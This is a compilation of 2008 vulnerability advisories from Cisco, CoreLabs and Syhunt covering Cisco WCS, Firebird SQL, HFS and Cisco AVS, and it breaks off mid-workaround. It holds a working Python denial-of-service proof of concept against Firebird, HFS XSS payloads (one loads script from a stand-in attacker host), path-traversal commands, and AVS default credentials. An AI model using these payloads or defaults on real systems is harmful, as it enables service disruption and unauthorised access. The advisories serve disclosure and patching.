Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======

Successful exploitation of the vulnerability may result in remote code
execution.

Software Versions and Fixes
===========================

Each row of the following software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible releases
that contain the fix are shown in the "First Fixed Release" column. A
device running a release in the given train that is earlier than the
release in a specific column (less than the First Fixed Release) is
known to be vulnerable. The release should be upgraded at least to the
indicated release or a later version (greater than or equal to the
First Fixed Release label).

+-------------------------------------------------------------+
| Affected Releases | First Fixed |
| | Releases |
|-----------------------------------------+-------------------|
| WCS for Linux and Windows 4.0.x and | 4.0.100.0 |
| earlier | |
|-----------------------------------------+-------------------|
| WCS for Linux and Windows 4.1.91.0 and | 4.2.62.0 |
| earlier | |
+-------------------------------------------------------------+

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory, and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Workarounds
===========

The following workarounds can be implemented.

Transit ACLs (tACL)
+------------------

Filters that deny HTTPS packets using TCP port 443 should be deployed
throughout the network as part of a tACL policy for protection of
traffic which enters the network at ingress access points. This policy
should be configured to protect the network device where the filter is
applied and other devices behind it. Filters for HTTPS packets using
TCP port 443 should also be deployed in front of vulnerable network
devices so that traffic is only allowed from trusted clients.

Additional information about tACLs is available in "Transit Access
Control Lists: Filtering at Your Edge":

http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional Mitigation Techniques
+-------------------------------

Additional mitigation techniques that can be deployed on Cisco devices
within the network are available in the Cisco Applied Intelligence
companion document for this advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20080130-wcs.shtml

Obtaining Fixed Software
========================

Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@... or security-alert@... for software
upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such as
Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through their
point of sale should acquire upgrades by contacting the Cisco Technical
Assistance Center (TAC). TAC contacts are as follows:

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@...

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is aware of the availability of proof-of-concept
exploits.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT
YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an uncontrolled
copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

* cust-security-announce@...
* first-teams@...
* bugtraq@...
* vulnwatch@...
* cisco@...
* cisco-nsp@...
* full-disclosure@...
* comp.dcom.sys.cisco@...

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------------+
| Revision 1.0 | 2008-January-30 | Initial public release. |
+-------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

+-----------------------------------------------------------------------
All contents are Copyright 2006-2007 Cisco Systems, Inc. All rights
reserved.
+-----------------------------------------------------------------------

Updated: Jan 29, 2008 Document ID: 100361

+-----------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (FreeBSD)

iD8DBQFHoKf686n/Gc8U/uARAm9sAKCHo6l9iJ87Y3H/UZd96HibLCMPAACfXvk9
q2P9vDmfgI45MPGr4GRgaY0=
=Dkxv
-----END PGP SIGNATURE-----

CORE-2007-1219: Firebird Remote Memory Corruption

2008-01-28T09:32:00Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

Firebird Remote Memory Corruption

*Advisory Information*

Title: Firebird Remote Memory Corruption
Advisory ID: CORE-2007-1219
Advisory URL: http://www.coresecurity.com/?action=item&id=2095
Date published: 2008-01-28
Date of last update: 2008-01-24
Vendors contacted: Firebird SQL
Release mode: Coordinated Release

*Vulnerability Information*

Class: Memory corruption
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: 27403
CVE Name: CVE-2008-0387

*Vulnerability Description*

Firebird [1][2] is a relational database that runs on Linux, Windows,
and a variety of Unix platforms. The Firebird Project is a commercially
independent project of C and C++ programmers, technical advisors and
supporters developing and enhancing a multi-platform relational database
management system based on the source code released by Inprise Corp (now
known as Borland Software Corp) on 25 July, 2000.

The Firebird database manager contains an Integer Overflow in the
processing of certain tags on the XDR protocol used for communication
with the server. This led the server to corrupt the process memory and
crash. Repeated attempts are followed by a crash of the process in
charge of restarting the database server. This may also grant attackers
remote execution of arbitrary code on servers running Firebird.

*Vulnerable packages*

. Firebird SQL 1.0.3 and before.
. Firebird SQL 1.5.5 and before.
. Firebird SQL 2.0.3 and before.
. Firebird SQL 2.1.0 Beta 2 and before.

*Non-vulnerable packages*

. Firebird SQL 1.5.6 (to be released)
. Firebird SQL 2.0.4 (to be released)
. Firebird SQL 2.1.0 RC1

*Vendor Information, Solutions and Workarounds*

Firebird v2.1.0 RC1 fixes this vulnerability and is available for
download at http://firebirdsql.org/index.php?op=files&id=fb210_RC1

The fix will also be included in versions v1.5.6 and v2.0.4. Version
2.0.4 will be released in February. The version 1.5.6 release is
expected later this year.

The issue is registered [3] in Firebird Tracker as CORE-1681.

*Credits*

This vulnerability was discovered and researched by Damian Frizza with
assistance of Alfredo Ortega from Core Security Technologies.

*Technical Description / Proof of Concept Code*

The memory corruption happens when the parser (src/remote/protocol.cpp)
receives any of the following operations with invalid data:

op_receive
op_start
op_start_and_receive
op_send
op_start_and_send
op_start_send_and_receive

The parser fails to properly sanitize certain variables before use. We
can see that in the file src/remote/protocol.cpp there are the following
assignments directly from the packet buffer to the data structure,
without any validation (The MAP macro doesn't have any range checking):

src/remote/protocol.cpp:417

MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
/* Changes to this op's protocol must mirror in xdr_protocol_overhead */
return xdr_request(xdrs, data->p_data_request,
data->p_data_message_number,
data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);

And in the function xdr_request(), the variable data->p_data_request (as
request_id) is used to index an array:

...
rrq* request = (rrq*) port->port_objects[request_id];
...

Corrupting memory structures and causing a DoS of the server, with
possible execution of code. The same happens with the variable
data->p_data_message_number.

The following python PoC causes a remote Denial of service and
demonstrates the bug:

##Firebird DoS
##Damian Frizza - Core Security Exploit Writers Team
##tested against Firebird-2.0.3.12981-1-Win32.exe and
##Firebird-2.1.0.16780_0_Win32.exe

##fbserver.exe 2.0.3
##005637D0 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
##005637D4 0FB700 MOVZX EAX,WORD PTR DS:[EAX]
##005637D7 83EC 50 SUB ESP,50
##005637DA 56 PUSH ESI
##005637DB 8BF1 MOV ESI,ECX
##005637DD 8B8E AC000000 MOV ECX,DWORD PTR DS:[ESI+AC]
##005637E3 3B41 08 CMP EAX,DWORD PTR DS:[ECX+8] <----
##CRASH HERE

import socket
import time

def getTargetIP():
return '192.168.xxx.xxx'

port= 3050
op = '\x4a'

packet = '\x00\x00\x00' + op + 'A' * 2000

##Making the connection and sending the data 5 times, fbguard.exe fails
##to restart the service.

for i in range(0, 5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((getTargetIP(), port))
s.send(str(packet))
s.close()
time.sleep(1)

*Report Timeline*

2008-01-04: Initial notification sent by CoreLabs to Firebird SQL
development team.
2008-01-08: Notification acknowledged by Firebird SQL development team.
2008-01-08: Technical details sent by Core to Firebird SQL dev. team.
2008-01-10: Firebird SQL dev. team notifies Core that a fix has been
produced, and will be released in Firebird versions v1.5.6, v2.0.4 and
v2.1.0 RC1.
2008-01-10: CoreLabs acknowledges information about fixes and requests
date of the v2.1.0 RC1 release to the Firebird dev. team.
2008-01-15: Firebird dev. team confirms vendor information and dates of
fixed versions.

*References*

[1] http://sourceforge.net/projects/firebird/
[2] http://www.firebirdsql.org/
[3] http://tracker.firebirdsql.org/browse/CORE-1681

*About Corelabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core augments its
leading technology solution with world-class security consulting
services, including penetration testing and software security auditing.
Based in Boston, MA and Buenos Aires, Argentina, Core Security
Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com .

*DISCLAIMER*

The contents of this advisory are copyright (c) 2008 CORE Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*PGP/GPG KEYS*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHnhGQyNibggitWa0RAjcmAJ94rGoTbUBQALmV5yOudJfL4B038QCgpzNw
dFwDpUnOO6OHI0L45rIwyFU=
=dlYg
-----END PGP SIGNATURE-----

Syhunt: HFS (HTTP File Server) Username Spoofing and Log Forging/Injection Vulnerability

2008-01-23T09:50:57Z

Syhunt: HFS (HTTP File Server) Username Spoofing and Log
Forging/Injection Vulnerability

Advisory-ID: 200801163
Discovery Date: 1.16.2008
Release Date: 1.23.2008
Affected Applications: HFS 1.5g to and including 2.3(Beta Build
#174); and possibly HFS version 1.5f
Non-Affected Applications: HFS 1.5e and earlier versions
Class: Log Forging/Injection, Username Spoofing
Status: Patch available/Vendor informed
Vendor: Massimo Melina
Vendor URL: http://www.rejetto.com/hfs -or- hfs.sourceforge.net

The Common Vulnerabilities and Exposures (CVE) project has
assigned the following CVEs to these vulnerabilities:
* CVE-2008-0407 - Username Spoofing Vulnerability
* CVE-2008-0408 - Log Forging / Injection Vulnerability

----------------------------------------------------------------

Overview:
HFS is a very popular open source HTTP server designed for
easily sharing files. According to information on the official
website, the HTTP File Server software has been downloaded about
2 million times.

Description:
HFS versions 1.5g to 2.3 Beta (and possibly version 1.5f) are
vulnerable to log forging and username spoofing vulnerabilities.
Remote attackers can appear to be logged in with any desired
username or perform log injection in the log file and GUI panel.
Technical details are included below.

----------------------------------------------------------------

Details (Replicating the issues):
1) Log Forging / Injection Vulnerability
http://www.syhunt.com/advisories/hfshack.txt
See the "maniplog" command

maniplog [localfilename]
This will inject the content of [localfilename] to the HFS log
panel and file.

2) Username Spoofing Vulnerability
a. Login at http://[host]/~login as [user_x]. Then request
(using a web browser): http://[user_y]:[anywrongpwd]@[host]/
--or--
b. send a direct request in the following format (does not
require previous login):
GET / HTTP/1.1
(...)
Authorization: Basic dXNlcl95

Both alternatives could make an admin to believe that user Y has
made the HTTP request when reviewing logs.

Additional Considerations:
* Vulnerabilities described here will not allow browsing
protected files and folders.

----------------------------------------------------------------

Vulnerability Status:
The author was contacted and HFS version 2.2c was released. The
new version can be downloaded at www.rejetto.com/hfs/download or
via the "Check for news/updates" option in the HFS menu.

Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
build.

HFS 2.3 Beta is only affected if the option "Accept any login
for unprotected resources" is enabled. This option, introduced
in this version, is disabled by default.

----------------------------------------------------------------

Credit:
Felipe Aragon and Alec Storm
Syhunt Security Research Team, www.syhunt.com

---

Copyright © 2008 Syhunt Security

Disclaimer:
The information in this advisory is provided "as is" without
warranty of any kind. Details provided are strictly for
educational and defensive purposes.

Syhunt is not liable for any damages caused by direct or
indirect use of the information provided by this advisory.

Syhunt: HFS (HTTP File Server) Log Arbitrary File/Directory Manipulation and Denial-of-Service Vulnerabilities

2008-01-23T09:49:51Z

Syhunt: HFS (HTTP File Server) Log Arbitrary File/Directory
Manipulation and Denial-of-Service Vulnerabilities

Advisory-ID: 200801162
Discovery Date: 1.16.2008
Release Date: 1.23.2008
Affected Applications: HFS 2.2 to and including 2.3(Beta Build
#174)
Non-Affected Applications: HFS 2.1d and earlier versions
Class: Arbitrary File/Directory Manipulation, Denial of Service
Status: Patch available/Vendor informed
Vendor: Massimo Melina
Vendor URL: http://www.rejetto.com/hfs -or- hfs.sourceforge.net

The Common Vulnerabilities and Exposures (CVE) project has
assigned the following CVEs to these vulnerabilities:
* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
* CVE-2008-0406 - Denial of Service (DoS) Vulnerability

----------------------------------------------------------------

Overview:
HFS is a very popular open source HTTP server designed for
easily sharing files. According to information on the official
website, the HTTP File Server software has been downloaded about
2 million times.

Description:
HFS (versions 2.2 to 2.3 beta) will not check if an account name
provided during navigation exists or contains any invalid chars
before logging information about a request. This is specially
dangerous if the server has been configured to use account names
as log filenames.

In this case, a remote attacker can use this flaw to create
arbitrary files, append data to arbitrary files, create
arbitrary folders or launch a DoS attack against the server.
Technical details are included below.

----------------------------------------------------------------

Details (Replicating the issues):
1) Arbitrary File/Directory Manipulation Vulnerability
http://www.syhunt.com/advisories/hfshack.txt
See the "mkd" and "manipf" commands

Example 1 - Arbitrary Directory Creation:
If HFS is running (for e.g.) in the C:\HFS directory, you can
create the C:\Syhunt\ directory by entering:
mkd ..\Syhunt

Example 2 - Arbitrary File Creation/Manipulation:
manipf [localfilename] [remotefilename]
manipf inject.html ..\Syhunt\index.html

This example would create the file "C:\Syhunt\index.html" and
append the content of the file "inject.html" to it.

2) Denial of Service (DoS) Vulnerability
http://www.syhunt.com/advisories/hfshack.txt
"checkdos" command

* HFS will close immediately after receiving the DoS request

* This issue is related to Windows limitations with long
filenames. XP has a limit of 255 characters; Windows Vista a 260
chars limit.

----------------------------------------------------------------

Vulnerability Status:
The vendor was contacted and has immediately released HFS 2.2c
which fixes these problems. The new version can be downloaded at
www.rejetto.com/hfs/download or via the "Check for news/updates"
option in the HFS menu.

As a workaround for the affected releases, users can temporarily
disable the logging feature or remove the %user% symbol from the
log filename.

Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
build.

HFS 2.3 Beta specifically is only affected if the option
"Accept any login for unprotected resources" is enabled. This
option, introduced in this version, is disabled by default.

----------------------------------------------------------------

Credit:
Felipe Aragon and Alec Storm
Syhunt Security Research Team, www.syhunt.com

---

Copyright © 2008 Syhunt Security

Disclaimer:
The information in this advisory is provided "as is" without
warranty of any kind. Details provided are strictly for
educational and defensive purposes.

Syhunt is not liable for any damages caused by direct or
indirect use of the information provided by this advisory.

Syhunt: HFS (HTTP File Server) Template Cross-Site Scripting and Information Disclosure Vulnerabilities

2008-01-23T09:48:38Z

Syhunt: HFS (HTTP File Server) Template Cross-Site Scripting and
Information Disclosure Vulnerabilities

Advisory-ID: 200801161
Discovery Date: 1.16.2008
Release Date: 1.23.2008
Affected Applications: HFS 2.0 to and including 2.3(Beta Build
#174)
Non-Affected Applications: HFS 1.6a and earlier versions
Class: Cross-Site Scripting (XSS), Information Disclosure
Status: Patch available/Vendor informed
Vendor: Massimo Melina
Vendor URL: http://www.rejetto.com/hfs -or- hfs.sourceforge.net

The Common Vulnerabilities and Exposures (CVE) project has
assigned the following CVEs to these vulnerabilities:
* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
* CVE-2008-0410 - Information Disclosure Vulnerability

----------------------------------------------------------------

Overview:
HFS is a very popular open source HTTP server designed for
easily sharing files. According to information on the official
website, the HTTP File Server software has been downloaded about
2 million times.

Description:
When a specific URL is visited, HFS displays a non-existent
account name in the response body. This non-existent account
name can be HTML code, allowing a remote attacker to use this
to launch XSS attacks.

Because the HTML code is also recognized by the web server as a
HFS HTML template, it is also possible to inject symbols to
force HFS to reveal details about the server (eg, current HFS
server version, build, connections, timestamp, uptime, current
outbound and inbound speed, and more). Technical details are
included below.

----------------------------------------------------------------

Details (Replicating the issues):

1) Cross-Site Scripting (XSS) and Host Field XSS Vulnerabilities
Example 1 - Launching a basic XSS:
http://<script>alert('Syhunt%20XSS')<%2fscript>a:x@[host]/

Example 2 - Injecting an external script (A mix of encoding and
javascript functions is used here to circumvent browser
URL limitations):
http://<script>var%20sChar=String%2efromCharCode(58)%3bdocument
%2ewrite('<script%20src=http'+sChar+'%2f%2fwww%2eattacker%2ecom
%2fxss%2ejs><%5c%2fscript>')%3b<%2fscript>a:x@[host]/

* This is specially dangerous if launched against Firefox. In
order to protect the password from prying eyes, Firefox entirely
hides what comes before the at (@) character and then only the
host name remains visible in the address bar. Firefox will also
resubmit the auth credentials everytime the host is visited
during the current browser session (unless new credentials are
supplied).

* User must be already logged in (via /~login) and the current
(root) path should not be password protected in the HFS-VFS
panel.

* If the host symbol is injected using this technique, HFS will
recognize it as a HTML template and return the data provided in
Host field of the request as part of the response body. The same
happens if the host symbol has been included (after
customization) in the current HFS HTML template.

Detection:
http://www.syhunt.com/advisories/hfshack.txt
See the "checkxss" command

Sandcat can also be used to identify this issue:
http://www.syhunt.com/sandcat

2) Information Disclosure

Example 1 - Injecting Symbols:
http://www.syhunt.com/advisories/hfshack.txt
The "ver" command will force HFS to reveal its version and build
The "symbols" command will force HFS to reveal additional
details about the server (such as connections, timestamp, uptime,
current outbound and inbound speed, and more).

* You can disable the "Send HFS identifier" option (which
enables the HFS banner) and remove all server identifier
symbols from the original HTML template, and still it will work.

Additional Considerations:
* An updated IE will not accept basic auth via URL. See:
http://support.microsoft.com/kb/834489 and the MS security
update 832894 if you wish to learn about this subject.

----------------------------------------------------------------

Vulnerability Status:
The vendor was contacted and has immediately released HFS 2.2c
which fixes these problems. The new version can be downloaded at
www.rejetto.com/hfs/download or via the "Check for news/updates"
option in the HFS menu.

As a workaround for the affected releases, users should remove
the %user% and %host% symbols from any HFS HTML templates.

Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
build.

HFS 2.3 Beta specifically is only affected if the option
"Accept any login for unprotected resources" is enabled. This
option, introduced in this version, is disabled by default.

----------------------------------------------------------------

Credit:
Felipe Aragon and Alec Storm
Syhunt Security Research Team, www.syhunt.com

---

Copyright © 2008 Syhunt Security

Disclaimer:
The information in this advisory is provided "as is" without
warranty of any kind. Details provided are strictly for
educational and defensive purposes.

Syhunt is not liable for any damages caused by direct or
indirect use of the information provided by this advisory.

Cisco Security Advisory: Default Passwords in the Application Velocity System

2008-01-23T09:28:29Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Default Passwords in the Application Velocity
System

Advisory ID: cisco-sa-20080123-avs

http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml

Revision 1.0

For Public Release 2008 January 23 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Versions of the Cisco Application Velocity System (AVS) prior to
software version AVS 5.1.0 do not prompt users to modify system account
passwords during the initial configuration process. Because there is no
requirement to change these credentials during the initial configuration
process, an attacker may be able to leverage the accounts that have
default credentials, some of which have root privileges, to take full
administrative control of the AVS system.

After upgrading to software version AVS 5.1.0, users will be prompted to
modify these credentials.

Cisco will make free upgrade software available to address this
vulnerability for affected customers. The software upgrade will
be applicable only for the AVS 3120, 3180, and 3180A systems. The
workaround identified in this document describes how to change the
passwords in current releases of software for the AVS 3110.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0029 has
been assigned to this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml.

Affected Products
=================

Vulnerable Products
+------------------

This vulnerability affects the Cisco AVS 3110, 3120, 3180, and 3180A
Management Station appliances that are running software versions prior
to AVS 5.1.0. Administrators can determine the software version of the
AVS appliances by logging in to the Management Station web-based user
interface or from the command-line interface (CLI) of the appliance
operating system.

Customers who use the AVS 3180 or 3180A Management Station can determine
their node software versions by navigating to the Cluster Information
Page. Each registered node will display the corresponding software
version when the node is selected.

The AVS appliance version can also be determined from the host operating
system by using the "Show Version" command.

The following example shows "Show Version" output for an AVS 3120
appliance that is running version 5.1.0:

velocity>Show Version

****************************************
Cisco Application Velocity System,(AVS)
----------------------------------------
AVS 3120-K9 005.001(000.034)
****************************************

The following example shows "Show Version" output for an AVS 3180 or
3180A appliance that is running version 5.1.0:

velocity>Show Version

****************************************
Cisco Application Velocity System,(AVS)
----------------------------------------
AVS 3180-MGMT 005.001(000.034)
****************************************

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

The Cisco AVS 3110 and 3120 are enterprise data center appliances for
improving web application performance, measuring end-user response
time, and managing application security. The Cisco AVS 3120 enforces
application security with an integrated web application firewall. The
Cisco AVS 3180 and 3180A Management Stations provide web-based tools for
the configuration and application performance monitoring for a cluster
of AVS 3110s and 3120s or individual nodes.

The Cisco AVS 3110, 3120, 3180, and 3180A Management Stations use some
system accounts that are initially configured with default passwords.
Vulnerable versions of the AVS software do not prompt the administrator
to change the passwords for these accounts, including accounts with root
privileges, during the initial configuration process. Non-vulnerable
versions of AVS software will now prompt administrators to change these
accounts after installation.

Note: If the passwords for the AVS 3110 or 3120 are changed on the
device itself and it has previously been registered with an AVS 3180
or 3180A Management Station, the node must be re-registered with the
Management Station console. Otherwise, communication between the AVS
3180 or 3180A Management Station and AVS 3110 or 3120 node will be lost.

For additional details about the AVS node registration process, refer to
the "Register Node" section of the Cisco AVS User's Guide.

After upgrading the appliance software to version AVS 5.1.0 and logging
in for the first time, the administrator will now be prompted to change
the system account passwords.

The following example shows the new password change prompts and the
subsequent password change dialog for the AVS 3120 after upgrade:

velocity login: fgn
Password:
**WARNING** System wide secrets are in factory default state.
Would you like to change these now? [y/n] y changing root password
enter password:
enter password again:
changing fgn password
enter password:
enter password again:
changing DB password
enter password:
enter password again:

Please wait...The DB password change will take a few minutes.
changing node manager password
enter password:
enter password again:
changing condenser password
enter password:
enter password again:
changing console password
enter password:
enter password again:

The following example shows the new password change prompts and the
subsequent password change dialog for the AVS 3180 and 3180A after
upgrade:

velocity login: fgn
Password:
**WARNING** System wide secrets are in factory default state.
Would you like to change these now? [y/n] y changing root password
enter password:
enter password again:
changing fgn password
enter password:
enter password again:
changing DB password
enter password:
enter password again:

Please wait...The DB password change will take a few minutes.
changing console password
enter password:
enter password again:

This issue is documented in Cisco Bug ID CSCsd94732.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

* AVS Default Account Passwords Don't Require Change (CSCsd94732)

CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete

CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======

Successful exploitation of the vulnerability may result in full
administrative control of the Cisco AVS system or user-level access to
the host operating system.

Software Versions and Fixes
===========================

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

AVS software version 5.1.0 contains the fix for the vulnerability
described in this document.

AVS software is available for download from the following locations on
cisco.com:

* AVS 3120 5.1.0 (http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3120-5.1)
* AVS 3180 5.1.0 (http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3180-5.1)

Workarounds
===========

The following workarounds are applicable only for the AVS 3110 and are
performed on the system shell. The AVS 3110 does not have a CLI. The use
of strong passwords is encouraged.

Changing the Root Password
+-------------------------

Complete these steps:

1. Change the root password by using the following command:

shell# passwd

2. Reboot to activate the new settings by using the following command:

shell# reboot

Changing the Management Console Username and Password
+----------------------------------------------------

Complete these steps:

1. Open the following file in a text editor:

$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
fgconsole.war/users.properties

Use the line admin=admin to set the username and password. The
username appears before the equal sign (=) and the password appears
after the equal sign (=). For example, to change the username to
Cisco and the password to accelerate, change the admin=admin line
to Cisco=accelerate.

2. If you change the username, you must also change this file:

$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
fgconsole.war/roles.properties

The username is set by the line that contains admin=. The username
appears before the equal sign (=). For example, to change the user
name to Cisco, change the admin= line to Cisco=. Do not change the
text after the equal sign (=) in this file; this field specifies
the account privileges. The username that you enter here must match
the one in the users.properties file in the preceding step.

Changing the Database Username and Password
+------------------------------------------

There are two steps required to change the database password:

1. First change the database password.
2. Then update the Management Console configuration file with the new
database password.

Complete these steps:

1. Log in to the database using the old password, and then use the
alter SQL command to change to the new password.

/usr/local/fineground/console/postgres/bin/psql
-U fineground -p 5432 fgnlog Password : <old password>
Welcome to psql 7.3.4, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit
fgnlog=# alter user fineground password '<new password>'; \q

2. The username and password to access the Management Console database
are set during the Management Console installation process. If you
want to change these later, you can modify an XML configuration
file that the Management Console server reads at start-up.

a. Open the following file in a text editor:

$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/
deploy/postgres-service.xml

Look for the following section in this file:


<config-property name="UserName" type="java.lang.String">fineground</config-property>
<config-property name="Password" type="java.lang.String">condenser</config-property>

b. To change the username, change the value for the UserName
configuration property (fineground in this example).

c. To change the password, change the value for the Password
configuration property (condenser in this example).

d. Save and close the file.

Changing the Node Manager Password
+---------------------------------

Complete these steps:

1. Log in as fgn, and then use the su command to switch to the
superuser.

2. Stop the Condenser and Node Manager:

/etc/init.d/fgnpn<Tab> stop

Press Tab to have the interface complete the command.

3. Go to the $AVS_HOME/perfnode/node_manager/conf directory.

4. Back up the file named passwords.

5. Change the password with the following command:

$AVS_HOME/perfnode/bin/htpasswd -bcm passwords.new admin <password>

In the preceding command, passwords.new is the name of the file in
which the passwords are stored. Currently only the user admin is
supported.

6. Install the file with the following command:

